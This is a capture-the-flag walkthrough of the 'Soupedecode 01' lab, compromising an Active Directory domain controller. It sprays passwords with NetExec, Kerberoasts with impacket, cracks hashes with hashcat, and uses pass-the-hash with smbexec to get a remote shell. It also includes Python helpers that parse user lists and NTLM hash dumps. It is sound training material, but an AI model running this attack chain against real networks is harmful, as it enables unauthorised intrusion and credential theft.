Soupedecode 01

-- "Test your enumeration skills on this boot-to-root machine."


Site Description

Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.

Challenge

Nmap

As part of initial reconnaissance, let's run an nmap scan against the target system to find all the open ports.

  • -sS: SYN scan
  • -sC: default script scan
  • -sV: service version detection
  • -vv: very verbose output
  • -T5: fastest (insane) timing template
  • -oA: save the output in all three formats (normal, grepable, XML) under the given base name

sudo nmap -sS -sC -sV -vv -T5 <--IP Address--> -oA Nmap/Soupedecoude.nmap


From the scan result we can see that the target is a Windows host acting as a Domain Controller for an Active Directory domain.

Two key details we can take away from the script scan are the domain name and the FQDN (Fully Qualified Domain Name):

  • Domain Name: SOUPEDECODE.LOCAL
  • FQDN: DC01.SOUPEDECODE.LOCAL

To enumerate further, let's add the target's domain name to our /etc/hosts file.

sudo nano /etc/hosts

Content:

<--IP Address--> soupedecode.local


SMB Enumeration

Open ports 139 and 445 show that SMB is enabled on the target. Using the nxc tool (NetExec), we can attempt to log in as the built-in guest account with an empty password.

nxc smb soupedecode.local -u guest -p ''


Since the guest login succeeds, we can use it to list the shares available on the target system.

nxc smb soupedecode.local -u guest -p '' --shares


User Enumeration

From the shares listing we learn that IPC$ is readable to us as guest. IPC$ is a special hidden share used for remote inter-process communication over named pipes; tools and services that manage or interact with remote systems use it, for example to list users or shares, or to start and stop services. (Read more about it here.)

Now, let's enumerate the users by RID brute-forcing (cycling through RIDs over IPC$ and resolving each SID to a name).

nxc smb soupedecode.local -u guest -p '' --rid-brute


Using shell tools or any other method, extract the account names from that output into a list called username.txt.
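As an added example that is not from the original write-up, here is a small Python helper that turns the --rid-brute output into username.txt, keeping only SidTypeUser entries and dropping machine accounts (the ones ending in $). The sample lines are constructed to match the usual nxc line layout; the RIDs shown for DC01$ and ybob317 are made up.

```python
import re
from pathlib import Path

# Constructed sample of nxc --rid-brute output (not real output from the room).
SAMPLE_OUTPUT = """\
SMB  10.201.9.153  445  DC01  500: SOUPEDECODE\\Administrator (SidTypeUser)
SMB  10.201.9.153  445  DC01  501: SOUPEDECODE\\Guest (SidTypeUser)
SMB  10.201.9.153  445  DC01  512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
SMB  10.201.9.153  445  DC01  1000: SOUPEDECODE\\DC01$ (SidTypeUser)
SMB  10.201.9.153  445  DC01  1105: SOUPEDECODE\\ybob317 (SidTypeUser)
"""

# "<rid>: <DOMAIN>\<name> (<SidType...>)" is the part of each line we care about.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def extract_users(text, include_machines=False):
    """Return the account names whose SID type is SidTypeUser, in output order.

    Groups and aliases are skipped. Machine accounts (trailing '$') are
    skipped too unless include_machines=True, since they rarely belong in a
    user list.
    """
    users = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if not m or m.group("kind") != "SidTypeUser":
            continue
        name = m.group("name")
        if name.endswith("$") and not include_machines:
            continue
        users.append(name)
    return users


def write_username_list(text, path="username.txt"):
    """Write one name per line to `path` and return how many were written."""
    users = extract_users(text)
    Path(path).write_text("".join(u + "\n" for u in users))
    return len(users)


if __name__ == "__main__":
    print(write_username_list(SAMPLE_OUTPUT), "users written to username.txt")
```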


AS-REP roasting and the other approaches tried with these usernames did not succeed. However, one of the weakest credential patterns is a password that is identical to the username.

Example: 
	admin:admin
	root:root

So, using the same tool, we can password-spray using the username list as the password list too (--no-brute pairs each username with the password on the same line instead of trying every combination).

nxc smb soupedecode.local -u username.txt -p username.txt --no-brute --continue-on-success


We find the user ybob317's password.

Let's try using this account to look at the file shares.

nxc smb soupedecode.local -u 'ybob317' -p 'ybob317' --shares


This means we can now access the Users share.

smbclient //soupedecode.local/Users -U ybob317


Looking under the Desktop folder of ybob317 we get the user flag.


Kerberos Enumeration

Next, let's Kerberoast the accounts that have SPNs (Service Principal Names) using the impacket tools.

impacket-GetUserSPNs soupedecode.local/ybob317:ybob317 -dc-ip 10.201.9.153 -request -outputfile hash.txt


With the hash written to hash.txt, we can try cracking it with hashcat.

hashcat hash.txt <--Location to your rockyou.txt-->


With the recovered password, we can try logging into the shares.

nxc smb soupedecode.local -u 'file_svc' -p '<--Password-->' --shares


Here, the backup share is readable to us. Let's connect to it and look at the contents.

smbclient //soupedecode.local/backup -U file_svc


We download the backup_extract.txt file, which contains NTLM hashes.


With these hashes, we can try to find one that belongs to an account allowed to execute remote commands over SMB.

Remote code over SMB

First, let's extract the usernames from this file.

cut -d ":" -f 1 backup_extract.txt > NTLM-Users.txt


Similarly, extract the NT hashes (the fourth field).

cut -d ":" -f 4 backup_extract.txt > NTLM-Hash.txt
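As an added alternative to the two cut commands (not part of the original write-up), this Python helper parses the dump in one pass, skips malformed lines and writes the two aligned lists, so line N of NTLM-Users.txt still matches line N of NTLM-Hash.txt. It assumes backup_extract.txt is in pwdump format (user:RID:LM:NT:::), which is what the field numbers used above imply; the sample lines, RIDs and hash values are constructed placeholders.

```python
import re
from pathlib import Path

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # well-known LM hash of an empty password

# Constructed sample in pwdump format; not the contents of the real backup_extract.txt.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
FileServer$:1104:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
this line is corrupt and has no fields
"""


def parse_pwdump(text):
    """Return a list of (username, nt_hash) tuples, skipping malformed lines.

    Because a bad line is dropped before the users and hashes are split into
    two files, the two lists stay aligned; nxc --no-brute pairs them line by
    line, so a mismatch here would test the wrong hash against each account.
    """
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.strip().split(":")
        if len(fields) < 4:
            print(f"line {lineno}: skipped, not in pwdump format")
            continue
        user, _rid, lm_hash, nt_hash = fields[:4]
        if not HEX32.match(nt_hash):
            print(f"line {lineno}: skipped, NT hash is not 32 hex characters")
            continue
        if lm_hash.lower() != EMPTY_LM:
            print(f"line {lineno}: note, {user} has a non-empty LM hash")
        entries.append((user, nt_hash.lower()))
    return entries


def write_pairs(entries, users_path="NTLM-Users.txt", hashes_path="NTLM-Hash.txt"):
    """Write the aligned user and hash files consumed by nxc -u/-H; return the count."""
    Path(users_path).write_text("".join(u + "\n" for u, _ in entries))
    Path(hashes_path).write_text("".join(h + "\n" for _, h in entries))
    return len(entries)


if __name__ == "__main__":
    print(write_pairs(parse_pwdump(SAMPLE_DUMP)), "accounts written")
```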


Now, let's spray these hashes against SMB (pass-the-hash), with each user paired to the hash on the same line.

nxc smb soupedecode.local -u NTLM-Users.txt -H NTLM-Hash.txt --no-brute


We get a valid NTLM hash for the FileServer$ account. With it, we can get remote command execution over SMB using smbexec.

impacket-smbexec 'FileServer$'@soupedecode.local -hashes ':<--Hash-->'


In the Desktop folder we find the root flag.


And there we go! Found the root flag too!!!


Thanks to josemlwdf for this amazing room! 😊